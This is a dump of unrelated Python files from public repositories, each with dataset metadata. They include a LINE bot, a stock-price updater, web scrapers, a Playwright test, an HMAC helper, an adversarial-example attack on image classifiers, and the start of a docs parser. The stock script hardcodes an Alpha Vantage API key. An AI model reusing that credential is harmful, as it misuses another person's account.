False\n\n#環境変数取得\nYOUR_CHANNEL_ACCESS_TOKEN = os.environ[\"YOUR_CHANNEL_ACCESS_TOKEN\"]\nYOUR_CHANNEL_SECRET = os.environ[\"YOUR_CHANNEL_SECRET\"]\n\nline_bot_api = LineBotApi(YOUR_CHANNEL_ACCESS_TOKEN)\nhandler = WebhookHandler(YOUR_CHANNEL_SECRET)\n\n@app.route(\"/\")\ndef hello_world():\n return \"hello world!\"\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n abort(400)\n\n return 'OK'\n\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n global flag\n global activate_\n\n if event.message.text == '啟動地鼠':\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text='我是 做了32年臨櫃 林桂翔'))\n activate_ = True\n\n if event.message.text == '地鼠88':\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text='運動中心老師 有個淺規則 不能跟學員亂來'))\n activate_ = False\n return\n\n if activate_:\n if flag:\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text='建議'))\n else:\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text='運動'))\n flag = not flag\n\n\nif __name__ == \"__main__\":\n# app.run()\n port = int(os.getenv(\"PORT\"))\n app.run(host=\"0.0.0.0\", port=port)","repo_name":"neilctwu/linebot_test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71503324266","text":"\"\"\"Sorting a file containing 1 000 000 000 integers using hashing method\"\"\"\r\n\r\nfile = open(\"big_file.txt\",\"r\")\r\nlst = [0] * 121\r\n\r\nfor i in range(1_000_000):\r\n #Reading 1 000 000 lines of the file\r\n nums = file.readline()\r\n\r\n nums = nums.split() #spliting the numbers in each line\r\n for j in range(121):\r\n count = nums.count(str(j))\r\n lst[j] += count #incrementing the number under the corresponding list index\r\n\r\nfile.close()\r\n\r\nprint(lst) # Every index shows how many times has the index_number occured in our file\r\n\r\nsorted_list = open(\"sorted_list.txt\",\"w\")\r\n\r\nel_counter = 0\r\nfor i in range(121):\r\n for j in range(lst[i]):\r\n sorted_list.write(str(i)+\" \")\r\n el_counter += 1\r\n if el_counter == 1000:\r\n sorted_list.write(\"\\n\")\r\n el_counter = 0\r\n\r\nsorted_list.close()","repo_name":"Tigran-Sargsyan/problems","sub_path":"hashing_sort/big_sort.py","file_name":"big_sort.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23506684248","text":"import argparse\nimport re\n\n\ndef read_num(label: str) -> int:\n while True:\n i = input(f'{label}: ')\n try:\n return int(i)\n except ValueError:\n print(f'\\'{i}\\' is not a valid number!')\n\n\ndef update_file(filename: str, regex: str, value: str):\n if args.verbose:\n print(f'Replacing [{regex}] with [{value}] at: {filename}')\n\n with open(filename, 'r') as file:\n data = file.read()\n\n data = re.sub(regex, value, data)\n\n with open(filename, 'w', newline='\\n') as file:\n file.write(data)\n\n\ndef update_files(x: int, y: int, x_offset: int, y_offset: int):\n print(f'Updating templates with coords ({x}, {y}), and ({x + x_offset}, {y + y_offset}) with offset ({x_offset}, {y_offset})')\n update_file('overlay.json',\n r'\"x\": \\d+',\n f'\"x\": {x + x_offset}')\n update_file('overlay.json',\n r'\"y\": \\d+',\n f'\"y\": {y + y_offset}')\n update_file('sync_overlay.py',\n r\"\\('template.png', \\((\\d|-)+, (\\d|-)+\\)\\)\",\n f\"('template.png', ({x + x_offset}, {y + y_offset}))\")\n update_file('index.html',\n r'data-reference=\"template.png\" data-x=\"(\\d|-)+\" data-y=\"(\\d|-)+\"',\n f'data-reference=\"template.png\" data-x=\"{x}\" data-y=\"{y}\"')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog='Steins;Place coord updater',\n description='Updates the coordinates in all the right places, taking offsets into'\n ' account, when appropriate.')\n parser.add_argument('-x', '--x', type=int)\n parser.add_argument('-y', '--y', type=int)\n parser.add_argument('-xo', '--x-offset', type=int, default=1500)\n parser.add_argument('-yo', '--y-offset', type=int, default=1000)\n parser.add_argument('-v', '--verbose', action='store_true')\n\n args = parser.parse_args()\n\n if not args.x:\n args.x = read_num('X coordinate')\n if not args.y:\n args.y = read_num('Y coordinate')\n\n update_files(args.x, args.y, args.x_offset, args.y_offset)\n","repo_name":"SandroHc/steins-place","sub_path":"update_coords.py","file_name":"update_coords.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"70559171309","text":"# -*- coding: utf-8 -*-\n\n# relies on JSON input of the form\n# {title -> string, author -> string, time -> datetime, text -> string}\nimport json\nimport datetime\nimport requests\nimport pandas as pd\nfrom load_articles import read_articles, write_articles\n\n\ndef write_hourlyStock(hourlyStock):\n with open('hourlyStock.json', 'w') as fp:\n json.dump(hourlyStock, fp)\n\n\ndef read_hourlyStock():\n with open('hourlyStock.json') as f:\n return json.load(f)\n\n\ndef updateJSON_prices(sym):\n APIKey = \"442ONKXSVHA79170\" # redact in submissions\n APIbase = \"https://www.alphavantage.co/query\"\n\n def rqstStockTSDataDaily(sym):\n r = None\n tries = 0\n maxTries = 10\n while not r and tries < maxTries:\n r = requests.get(APIbase, params={\n \"function\": \"TIME_SERIES_DAILY\", \"symbol\": sym, \"outputsize\": \"full\", \"apikey\": APIKey})\n tries += 1\n\n if not r:\n raise ValueError(\"Something unexpected happened.\")\n\n return r.json()[\"Time Series (Daily)\"]\n\n def getTSDataDaily(stockDat, t):\n try:\n e = stockDat[t.strftime(\"%Y-%m-%d\")]\n return {\"open\": round(float(e[\"1. open\"]), 2),\n \"close\": round(float(e[\"4. close\"]), 2),\n \"high\": round(float(e[\"2. high\"]), 2),\n \"low\": round(float(e[\"3. low\"]), 2),\n \"volume\": int(e[\"5. volume\"])}\n except KeyError:\n return False\n\n def getTSDataDailyForceSuccessFuture(stockDat, t, maxFail):\n y = getTSDataDaily(stockDat, t)\n i = 0\n while not y:\n t += datetime.timedelta(days=1)\n y = getTSDataDaily(stockDat, t)\n i += 1\n if i == maxFail:\n return False\n\n return (t, y)\n\n def get_datetime(article):\n return datetime.datetime.strptime(article['date_published'], \"%Y-%m-%dT%H:%M:%SZ\")\n\n def get_dtnearest_hr(article):\n return (get_datetime(article) - datetime.timedelta(hours=5)).replace(second=0, minute=0)\n\n def get_timeframe(data):\n dt_start = get_dtnearest_hr(data[0])\n dt_end = get_dtnearest_hr(data[-1])\n diff = dt_end - dt_start\n tot_hours = diff.days * 24 + diff.seconds / 3600 + 1\n timeframe = pd.date_range(start=str(dt_start), end=str(dt_end), periods=tot_hours)\n return timeframe\n\n # Updates hourlyStock\n dailyDat = rqstStockTSDataDaily(sym)\n dat = read_articles()\n dat = sorted(dat, key=lambda entry: get_datetime(entry))\n timeframe = get_timeframe(dat)\n hourlyStock = dict.fromkeys(timeframe)\n for t in timeframe:\n result = getTSDataDailyForceSuccessFuture(dailyDat, t, 1000)\n hourlyStock[t] = result[1][\"close\"] - result[1][\"open\"]\n hourlyStock = {str(k): v for k, v in hourlyStock.items()}\n write_hourlyStock(hourlyStock)\n\n # Updates the articles with delta values\n for article in dat:\n # round down to nearest hour\n t = (datetime.datetime.strptime(\n article[\"date_published\"], \"%Y-%m-%dT%H:%M:%SZ\") - datetime.timedelta(hours=5)).replace(second=0, minute=0)\n # print(dailyDat)\n result = getTSDataDailyForceSuccessFuture(dailyDat, t, 1000)\n if not result:\n article[\"delta\"] = float(0)\n else:\n article[\"delta\"] = result[1][\"close\"] - result[1][\"open\"]\n if t.date() == result[0].date():\n article[\"const\"] = True\n else:\n article[\"const\"] = False\n\n write_articles(dat)\n\n\n###################################TEST CODE HERE###################################\n# p = rqstStockTSData(\"FB\", 30) #check\n# q = getTSData(\"FB\", 30, datetime.datetime(2020, 1, 22, 16, 0)) #check\n# use average of opening and closing price\n# with open(dataFile, 'r') as f:\n# dat = json.load(f)\n# dailyDat = rqstStockTSDataDaily(\"FB\")\n# for article in dat:\n# t = (datetime.datetime.strptime(article[\"date_published\"], \"%Y-%m-%dT%H:%M:%SZ\") - datetime.timedelta(hours=5)).replace(second = 0, minute = 0)\n# print(t)\n# t_actual, s = getTSDataDailyForceSuccessFuture(dailyDat, t, 1000)\n# print(s)\n# print(\"Time: \" + str(t) + \" | Actual indexed time: \" + str(t_actual) + \" | Stock difference: %0.2f\" % (s[\"close\"] - s[\"open\"]))\nif __name__ == '__main__':\n updateJSON_prices(\"FB\")\n","repo_name":"ericygu/StocksAndStringsDuo","sub_path":"stock_parse.py","file_name":"stock_parse.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5114583969","text":"from imports import *\n\n\ndef search_filter(playwright: Playwright, test_name: str) -> None:\n browser = playwright.chromium.launch(headless=False)\n context = browser.new_context()\n context.tracing.start(screenshots=True, snapshots=True, sources=True)\n page = context.new_page()\n page.goto(\"https://gepur.com/uk\")\n\n page.hover(\".styles_accordion__1nYPJ\") # open sidebar menu\n page.click(\"a[href^='/uk/catalog/odezhda']\") # odezhda sub menu\n\n page.click(\"a[href^='/uk/catalog/futbolki-majki']\") # tops category\n\n page.wait_for_timeout(1000)\n\n # page.click(\"//div[@class='promo-banner__close']\") # close banner\n # page.click(\"//span[@class='text']\") # close pop-up menu\n\n page.click(\"//div[@class='styles_more-filters__1bNkD']\") # All filters button\n page.wait_for_timeout(500)\n\n filters = page.locator(\"//div[@class='clearfix styles_filter-select__3qjY5']\").all() # list of filters\n price_sales = filters[6]\n price_sales.click()\n page.wait_for_timeout(500)\n\n page.fill(\"//input[@name='maxPrice']\", \"1200\") # input max price field\n\n show_buttons = page.locator(\"//button[@class='btn dark md']\").all() # accept button\n button = show_buttons[6]\n button.click()\n page.wait_for_timeout(1000)\n\n page.click(\"//div[@class='styles_sorting-static__2189g']\") # sorting menu\n\n sorting_filters = page.locator(\"//li[@class='styles_item__1Gxg6']\").all() # from cheapest to expensive filter\n cheapest_to_expensive = sorting_filters[1]\n cheapest_to_expensive.click()\n page.wait_for_timeout(1000)\n\n page.locator(\"//div[@class='catalog-origin__catalog-wrapper']/div\").nth(0) # first product\n page.wait_for_timeout(2000)\n items_price = page.locator(\"//div[@class='styles_prices__7vcJI']\").nth(0)\n price = items_price.inner_text() # assertion price\n expected_price = \"1200 грн\"\n expected_price_value = int(''.join(filter(str.isdigit, expected_price)))\n actual_price_value = int(''.join(filter(str.isdigit, price)))\n # assert actual_price_value <= expected_price_value\n if actual_price_value <= expected_price_value:\n print(\"\\nFilter is working correctly\")\n else:\n print(\"\\nFilter is working wrong\")\n\n global_report_path = get_report_path(test_name)\n context.tracing.stop(path=global_report_path)\ndef test_search_product_and_filter():\n with sync_playwright() as playwright:\n test_name = \"test_price_filters_and_sorting\"\n get_report_path(test_name)\n search_filter(playwright, test_name)\n","repo_name":"Zhekich123/gepur_automation_tests","sub_path":"smoke_test/test_price_filters_and_sorting.py","file_name":"test_price_filters_and_sorting.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25506061807","text":"import json\nimport openconfig_platform\nfrom pyangbind.lib import pybindJSON\n\nindent = 10 \nparent = None\nparentSlot = None\nparentSlotIndent = 0\ndef walkList(listContents, componentType):\n global indent\n global parent \n global parentSlot\n global parentSlotIndent\n# print (\"Component Type:\" + componentType + \" Indent:\" + str(indent))\n if (componentType == 'shelf'):\n if listContents[0]['tid'] in op.components.component:\n return\n shelf = op.components.component.add(listContents[0]['tid'])\n# shelf = op.components.component.add(listContents[0]['name'])\n parent = shelf\n if ('vendor' in listContents[0]):\n shelf.state.mfg_name = listContents[0]['vendor']\n# if ('type' in listContents[0]):\n# shelf.model.componenttype = listContents[0]['type']\n if ('model' in listContents[0]):\n shelf.state.description = listContents[0]['model']\n\n if (componentType == 'slot'):\n for item in listContents:\n # Slot/subslot \n slot = None;\n if (parentSlot == None):\n parentSlot = item['slotName']\n parentSlotIndent = indent\n slot = parent.holder.slots.slot.add(item['slotName'])\n slot.slotnumber = item['slotNumber']\n\n if (parentSlotIndent == indent):\n parentSlot = item['slotName']\n if ( item['slotName'] not in parent.holder.slots.slot ):\n slot = parent.holder.slots.slot.add(item['slotName'])\n slot.slotnumber = item['slotNumber']\n\n if (item['slotName'] != parentSlot):\n slot = parent.holder.slots.slot[parentSlot]\n\n if ('card' in item):\n card = op.components.component.add(item['card'][0]['cardId'])\n if ('description' in item['card'][0]):\n card.state.description = item['card'][0]['description']\n card.state.mfg_name = item['card'][0]['vendor']\n comp = slot.component.add(item['card'][0]['cardId'])\n if (item['slotName'] != parentSlot):\n comp.subslotname = item['slotName']\n comp.subslot = item['slotNumber']\n \n\n\n for item in listContents:\n# if (type(item) == str):\n# print ( \"---\" + item + \":\" + listContents[item])\n if (type(item) == dict):\n indent=indent+5\n walkDict(item)\t\n indent=indent-5\n\ndef walkDict(dictItem):\n global indent\n for dictTag in dictItem:\n# if (type(dictItem[dictTag]) == str):\n# print(' '.rjust(indent) + dictTag + \":\" + dictItem[dictTag])\n if (type(dictItem[dictTag]) == dict):\n# print('DictTag:'+ dictTag)\n walkDict(dictItem[dictTag])\n# if (type(dictItem[dictTag]) == list and ( dictTag == 'shelf' or dictTag == 'slot' or dictTag == 'card' or dictTag == 'port')):\n if (type(dictItem[dictTag]) == list and ( dictTag == 'shelf' or (dictTag == 'slot') or dictTag == 'card')):\n# print(' '.rjust(indent) + 'ListTag:'+ dictTag)\n walkList(dictItem[dictTag], dictTag)\n\nop = openconfig_platform.openconfig_platform()\ndef convertToYangJsonStr(jsonObj):\n equipdata = jsonObj['equipmentDtlData']\n for equipment in equipdata['equipmentLst']:\n for equipmentContainer in equipment['equipmentContainer']:\n for virtualNE in equipmentContainer['virtualNE']:\n for equipTag in virtualNE:\n if (type(virtualNE[equipTag]) == list):\n walkList(virtualNE[equipTag], equipTag)\n return(pybindJSON.dumps(op))\n","repo_name":"Verizon/YANG-validator","sub_path":"transformer/UTSEquipment.py","file_name":"UTSEquipment.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"70172135147","text":"import hashlib\nimport sys\nimport time\nsys.path.insert(1, \"../../\")\nimport set1.chall_2.fixedXor as ENC\n\ndef hmac(ipBytes, key, hashFunc, blockSize, outputSize):\n opad = bytes(('\\x5c'*blockSize).encode('latin1'))\n ipad = bytes(('\\x36'*blockSize).encode('latin1'))\n\n if len(key) > blockSize:\n h = hashFunc.copy()\n h.update(key)\n key = h.digest()\n \n keyPad = '\\x00'*(blockSize - len(key))\n keyPad = bytes(keyPad.encode('latin1'))\n key = key + keyPad\n\n o_key_pad = ENC.fixedXor(key, opad)\n i_key_pad = ENC.fixedXor(key, ipad)\n\n h = hashFunc.copy()\n h.update(i_key_pad+ipBytes)\n tempHash = h.digest()\n \n h = hashFunc.copy()\n h.update(o_key_pad+tempHash)\n finalHash = h.digest()\n\n return finalHash\n\n\ndef main():\n ip = 'abcde'\n ip = bytes(ip.encode('latin1'))\n key = 'b'*10\n key = bytes(key.encode('latin1'))\n hashFunc = hashlib.new('sha1')\n mac = hmac(ip, key, hashFunc, hashFunc.block_size, hashFunc.digest_size)\n print(mac)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"D-setia/CryptoPals","sub_path":"set4/chall_31/hmac.py","file_name":"hmac.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21387023518","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport numpy as np\n\n#result = requests.get('http://www.cdiscount.com/search/10/ordinateur.html#_his__')\ndef getSoup(url) :\n result = requests.get(url)\n soup = BeautifulSoup(result.text, 'html.parser')\n pc = soup.find_all(class_='prdtBloc')\n return pc\n\ndef getReductions(url):\n pc = getSoup(url)\n marques = []\n prix_org = []\n prix_red = []\n for i in range(1, len(pc)):\n prix_origin = pc[i].find(class_=\"prdtPrSt\")\n if prix_origin :\n prix_origin = prix_origin.text.replace(u'\\xa0', '')\n prix_origin = prix_origin.replace(',', '.')\n if prix_origin :\n prix_reduit = pc[i].find(class_=\"price\").text.replace(u'\\xa0', '')\n prix_reduit = prix_reduit.replace('€', '.')\n prix_reduit = float(prix_reduit)\n prix_org.append(float(prix_origin))\n prix_red.append(prix_reduit)\n all_marque = pc[i].find(class_='prdtBTit')\n marque = all_marque.text.replace(u'\\xa0', '')\n marques.append(marque)\n df_marque = pd.DataFrame(marques, columns=['Marques'])\n reductions_origin = pd.DataFrame(prix_org, columns=['Prix_Origine'])\n reductions_reduit = pd.DataFrame(prix_red, columns=['Prix_Réduit'])\n reductions_dataFrame = df_marque.join(reductions_origin)\n reductions_dataFrame = reductions_dataFrame.join(reductions_reduit)\n\n\n return reductions_dataFrame\n\n\ndef getcompare(marque1, marque2, url) :\n reductions_dataFrame = getReductions(url)\n liste_marque = reductions_dataFrame['Marques']\n df1 = reductions_dataFrame.copy()\n df2 = reductions_dataFrame.copy()\n\n df1['marque'] = df1.loc[df1['Marques'].str.contains(marque1), 'test'] = marque1\n df2['marque'] = df2.loc[df2['Marques'].str.contains(marque2), 'test'] = marque2\n df1 = df1.dropna(axis=0)\n df2 = df2.dropna(axis=0)\n df1 = df1.drop('test', axis =1)\n df2 = df2.drop('test', axis =1)\n df1['Reduction'] = ((df1['Prix_Origine'] - df1['Prix_Réduit'])/df1['Prix_Origine'])*100\n df2['Reduction'] = ((df2['Prix_Origine'] - df2['Prix_Réduit']) / df2['Prix_Origine'])*100\n\n\n print('Première Marque : '+ marque1)\n print(df1)\n\n print('Seconde Marque : '+ marque2)\n print(df2)\n return\n\nfor i in (range(1,5)):\n print(2*'------------------', 'Page' , i, 2*'------------------')\n getcompare('LENOVO', 'HP', 'http://www.cdiscount.com/search/10/ordinateur.html?page='+str(i)+'#_his__')\n\n\n","repo_name":"SkatiRCI/starter-kit-datascience","sub_path":"guy-marcel-mbula/Lesson3/exo_cc_lesson3.py","file_name":"exo_cc_lesson3.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"71790934826","text":"from typing import Union, Tuple\nimport eagerpy as ep\n\nfrom ..models import Model\nimport math\nfrom ..criteria import Misclassification, TargetedMisclassification\n\nfrom ..devutils import atleast_kd, flatten\n\nfrom .base import FixedEpsilonAttack\nfrom .base import get_criterion\nfrom .base import T\n\n\ndef normalize_l2_norms(x: ep.Tensor) -> ep.Tensor:\n norms = flatten(x).square().sum(axis=-1).sqrt()\n norms = ep.maximum(norms, 1e-12) # avoid division by zero\n factor = 1 / norms\n factor = atleast_kd(factor, x.ndim)\n return x * factor\n\n\nclass DDNAttack(FixedEpsilonAttack):\n \"\"\"DDN Attack\"\"\"\n\n def __init__(\n self,\n rescale: bool = False,\n epsilon: float = 2.0,\n init_epsilon: float = 1.0,\n steps: int = 10,\n gamma: float = 0.05,\n ):\n\n self.rescale = rescale\n self.epsilon = epsilon\n self.init_epsilon = init_epsilon\n self.steps = steps\n self.gamma = gamma\n\n def __call__(\n self,\n model: Model,\n inputs: T,\n criterion: Union[Misclassification, TargetedMisclassification, T],\n ) -> T:\n\n x, restore_type = ep.astensor_(inputs)\n criterion_ = get_criterion(criterion)\n del inputs, criterion\n\n N = len(x)\n\n if isinstance(criterion_, Misclassification):\n targeted = False\n classes = criterion_.labels\n elif isinstance(criterion_, TargetedMisclassification):\n targeted = True\n classes = criterion_.target_classes\n else:\n raise ValueError(\"unsupported criterion\")\n\n if classes.shape != (N,):\n name = \"target_classes\" if targeted else \"labels\"\n raise ValueError(\n f\"expected {name} to have shape ({N},), got {classes.shape}\"\n )\n\n if self.rescale:\n min_, max_ = model.bounds\n scale = (max_ - min_) * math.sqrt(flatten(x).shape[-1])\n init_epsilon = self.epsilon * scale\n else:\n init_epsilon = self.epsilon\n\n stepsize = ep.ones(x, len(x))\n\n def loss_fn(\n inputs: ep.Tensor, labels: ep.Tensor\n ) -> Tuple[ep.Tensor, ep.Tensor]:\n logits = model(inputs)\n\n sign = -1.0 if targeted else 1.0\n loss = sign * ep.crossentropy(logits, labels).sum()\n is_adv = criterion_(inputs, logits)\n\n return loss, is_adv\n\n grad_and_is_adversarial = ep.value_and_grad_fn(x, loss_fn, has_aux=True)\n\n delta = ep.zeros_like(x)\n\n epsilon = init_epsilon * ep.ones(x, len(x))\n worst_norm = flatten(ep.maximum(x, 1 - x)).square().sum(axis=-1).sqrt()\n\n best_l2 = worst_norm\n best_delta = delta\n adv_found = ep.zeros(x, len(x)).bool()\n\n for i in range(self.steps):\n x_adv = x + delta\n\n _, is_adversarial, gradients = grad_and_is_adversarial(x_adv, classes)\n gradients = normalize_l2_norms(gradients)\n\n l2 = ep.norms.l2(flatten(delta), axis=-1)\n is_smaller = l2 < best_l2\n\n is_both = ep.logical_and(is_adversarial, is_smaller)\n adv_found = ep.logical_or(adv_found, is_adversarial)\n best_l2 = ep.where(is_both, l2, best_l2)\n\n best_delta = ep.where(atleast_kd(is_both, x.ndim), delta, best_delta)\n\n # perform cosine annealing of LR starting from 1.0 to 0.01\n delta = delta + atleast_kd(stepsize, x.ndim) * gradients\n stepsize = (\n 0.01 + (stepsize - 0.01) * (1 + math.cos(math.pi * i / self.steps)) / 2\n )\n\n epsilon = epsilon * ep.where(is_adversarial, 1 - self.gamma, 1 + self.gamma)\n epsilon = ep.minimum(epsilon, worst_norm)\n\n # do step\n delta = delta + atleast_kd(stepsize, x.ndim) * gradients\n\n # clip to valid bounds\n delta = (\n delta\n * atleast_kd(epsilon, x.ndim)\n / delta.square().sum(axis=(1, 2, 3), keepdims=True).sqrt()\n )\n delta = ep.clip(x + delta, *model.bounds) - x\n\n x_adv = x + delta\n\n return restore_type(x_adv)\n","repo_name":"jonasrauber/foolbox-native","sub_path":"foolbox/ext/native/attacks/ddn.py","file_name":"ddn.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"69825188268","text":"from collections import namedtuple\nimport rx\nimport rxsci as rs\n\nx = namedtuple('x', ['foo', 'bar', 'biz'])\n\n\ndef test_fill_none_namedtuple():\n source = [\n x(None, 2, 3),\n x(None, None, None),\n x(1, None, None),\n x(1, 2, None),\n ]\n expected_result = [\n x(0, 2, 3),\n x(0, 0, 0),\n x(1, 0, 0),\n x(1, 2, 0),\n ]\n actual_result = []\n\n rx.from_(source).pipe(\n rs.data.fill_none(0)\n ).subscribe(on_next=actual_result.append)\n\n assert actual_result == expected_result\n\n\ndef test_fill_none_value():\n source = [\n None,\n 1.2,\n 5.348,\n None,\n ]\n expected_result = [\n 0, 1.2, 5.348, 0\n ]\n actual_result = []\n\n rx.from_(source).pipe(\n rs.data.fill_none(0)\n ).subscribe(on_next=actual_result.append)\n\n assert actual_result == expected_result\n\n\ndef test_fill_none_mux():\n source = [\n rs.OnCreateMux((1 ,None)),\n rs.OnNextMux((1, None), None),\n rs.OnNextMux((1, None), 1.2),\n rs.OnNextMux((1, None), 5.348),\n rs.OnNextMux((1, None), None),\n rs.OnCompletedMux((1, None)),\n ]\n actual_result = []\n\n rx.from_(source).pipe(\n rs.cast_as_mux_observable(),\n rs.data.fill_none(0)\n ).subscribe(on_next=actual_result.append)\n\n assert actual_result == [\n rs.OnCreateMux((1 ,None)),\n rs.OnNextMux((1, None), 0),\n rs.OnNextMux((1, None), 1.2),\n rs.OnNextMux((1, None), 5.348),\n rs.OnNextMux((1, None), 0),\n rs.OnCompletedMux((1, None)),\n ]\n","repo_name":"maki-nage/rxsci","sub_path":"tests/data/test_fill_none.py","file_name":"test_fill_none.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"73247063148","text":"names = [\"Harry\", \"Ron\", \"Hermoine\"]\n# list - mutable\nprint(names[0])\n\ncoordinate = (10.0, 20.0)\n# tuple - not mutable\n\n# set - collection of unique\n# dict - hash \n\n#Define a list of names\n\nnames = [\"Harry\", \"Ron\", \"Hermoine\", \"Ginny\"]\n\nnames.append(\"Draco\")\n\nnames.sort()\n\nprint(names)\n\n# Create empty set \ns = set()\n\n# Add elements to set ALWAYS unique\n\ns.add(1)\ns.add(2)\ns.add(3)\ns.add(4)\ns.add(3)\ns.remove(2)\n\n\nprint(s)\nprint(f\"The set has {len(s)} elements.\")\n","repo_name":"gaurijo/python_exercises","sub_path":"sequences.py","file_name":"sequences.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"460612210","text":"from typing import List\nfrom .IngestorInterface import IngestorInterface\nfrom .QuoteModel import QuoteModel\n\n\nclass TextIngestor(IngestorInterface):\n \"\"\"Gets Quotes from a txt File\"\"\"\n supported_extension = ['txt']\n\n @classmethod\n def parse(cls, path: str) -> List[QuoteModel]:\n if not cls.can_ingest(path):\n raise Exception('cannot ingest extension')\n\n quotes = list()\n with open(path, 'r') as f:\n for line in f.readlines():\n line = line.strip('\\n\\r').strip()\n if len(line):\n body, author = line.split('-')\n new_quote = QuoteModel(body, author)\n quotes.append(new_quote)\n\n return quotes\n","repo_name":"YogeshKJ/meme-generator-starter-code","sub_path":"src/QuoteEngine/TextIngestor.py","file_name":"TextIngestor.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36598938393","text":"import json\nfrom typing import Tuple\n\nfrom lsprotocol import types\n\n\nfrom ..client import LanguageClient\n\n\nasync def test_diagnostics(\n json_server_client: Tuple[LanguageClient, types.InitializeResult],\n uri_for,\n):\n \"\"\"Ensure that diagnostics are working as expected.\"\"\"\n client, _ = json_server_client\n\n test_uri = uri_for(\"example.json\")\n assert test_uri is not None\n\n # Get the expected error message\n document_content = \"text\"\n try:\n json.loads(document_content)\n except json.JSONDecodeError as err:\n expected_message = err.msg\n\n client.text_document_did_open(\n types.DidOpenTextDocumentParams(\n text_document=types.TextDocumentItem(\n uri=test_uri, language_id=\"json\", version=1, text=document_content\n )\n )\n )\n\n await client.wait_for_notification(types.TEXT_DOCUMENT_PUBLISH_DIAGNOSTICS)\n\n diagnostics = client.diagnostics[test_uri]\n assert diagnostics[0].message == expected_message\n\n result = await client.text_document_diagnostic_async(\n types.DocumentDiagnosticParams(\n text_document=types.TextDocumentIdentifier(test_uri)\n )\n )\n diagnostics = result.items\n assert diagnostics[0].message == expected_message\n\n workspace_result = await client.workspace_diagnostic_async(\n types.WorkspaceDiagnosticParams(previous_result_ids=[])\n )\n diagnostics = workspace_result.items[0].items\n assert diagnostics[0].message == expected_message\n","repo_name":"openlawlibrary/pygls","sub_path":"tests/lsp/test_diagnostics.py","file_name":"test_diagnostics.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":446,"dataset":"github-code","pt":"37"} +{"seq_id":"36264684431","text":"import collections\nimport logging\nimport os.path\nimport sys\nimport typing\nimport urllib.parse\nfrom collections import defaultdict\nfrom copy import deepcopy\nfrom typing import (\n Any,\n Callable,\n Dict,\n Iterable,\n List,\n MutableSequence,\n NamedTuple,\n Optional,\n Sequence,\n Set,\n Tuple,\n)\n\nfrom . import n, specparser, util\nfrom .diagnostics import (\n AmbiguousTarget,\n Diagnostic,\n DuplicateDirective,\n ExpectedPathArg,\n ExpectedTabs,\n InvalidChild,\n InvalidIAEntry,\n InvalidInclude,\n InvalidTocTree,\n MissingOption,\n MissingTab,\n MissingTocTreeEntry,\n SubstitutionRefError,\n TargetNotFound,\n UnnamedPage,\n)\nfrom .eventparser import EventParser, FileIdStack\nfrom .page import Page\nfrom .target_database import TargetDatabase\nfrom .types import FileId, ProjectConfig, SerializableType\nfrom .util import SOURCE_FILE_EXTENSIONS\n\nlogger = logging.getLogger(__name__)\n\n\n# XXX: The following two functions should probably be combined at some point\ndef get_title_injection_candidate(node: n.Node) -> Optional[n.Parent[n.Node]]:\n \"\"\"Dive into a tree of nodes, and return the deepest non-inline node if and only if the tree is linear.\"\"\"\n while True:\n if isinstance(node, n.Parent):\n if len(node.children) > 1:\n return None\n elif len(node.children) == 1:\n node = node.children[0]\n else:\n return node\n else:\n return None\n\n\ndef get_deepest(node: n.Node) -> Optional[n.Node]:\n \"\"\"Dive into a tree of nodes, and return the deepest node if and only if the tree is linear.\"\"\"\n while True:\n if isinstance(node, n.Parent):\n if len(node.children) > 1:\n return None\n elif len(node.children) == 1:\n node = node.children[0]\n else:\n return node\n else:\n return node\n\n\ndef deep_copy_position(source: n.Node, dest: n.Node) -> None:\n \"\"\"Copy the source position data from one node to another, for the case\n where the dest node's positional data is irrelevant or comes from another file.\"\"\"\n source_position = source.span\n dest.span = source_position\n if isinstance(dest, n.Parent):\n for child in dest.children:\n deep_copy_position(source, child)\n\n\nclass ProgramOptionHandler:\n \"\"\"Handle the program & option rstobjects, using the last program target\n to populate option targets.\"\"\"\n\n def __init__(self, diagnostics: 